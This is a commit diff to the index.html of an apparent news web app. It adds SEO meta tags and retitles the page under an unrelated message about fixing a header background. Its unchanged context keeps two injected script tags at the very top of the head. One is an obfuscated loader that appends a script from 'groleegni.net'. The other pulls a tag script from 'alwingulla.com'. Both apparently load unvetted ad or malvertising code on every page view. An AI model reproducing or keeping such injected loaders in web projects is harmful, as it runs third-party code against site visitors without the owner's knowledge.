Fix header background and add new files

--- a/index.html
+++ b/index.html
@@ -6,9 +6,13 @@
     <script>(function(d,z,s){s.src='https://'+d+'/401/'+z;try{(document.body||document.documentElement).appendChild(s)}catch(e){}})('groleegni.net',8683210,document.createElement('script'))</script>
     <script src="https://alwingulla.com/88/tag.min.js" data-zone="120761" async data-cfasync="false"></script>
     <meta charset="UTF-8" />
-    <link rel="icon" type="image/svg+xml" href="/vite.svg" />
     <meta name="viewport" content="width=device-width, initial-scale=1.0" />
-    <title>The Daily News Hub</title>
+    <meta name="description" content="Daily News - Your trusted source for the latest news and updates" />
+    <meta name="keywords" content="news, daily news, latest news, breaking news" />
+    <meta name="robots" content="index, follow" />
+    <link rel="canonical" href="https://yourdomain.com" />
+    <link rel="icon" type="image/svg+xml" href="/vite.svg" />
+    <title>Daily News - Latest Updates</title>
   </head>
   <body>
     <div id="root"></div>
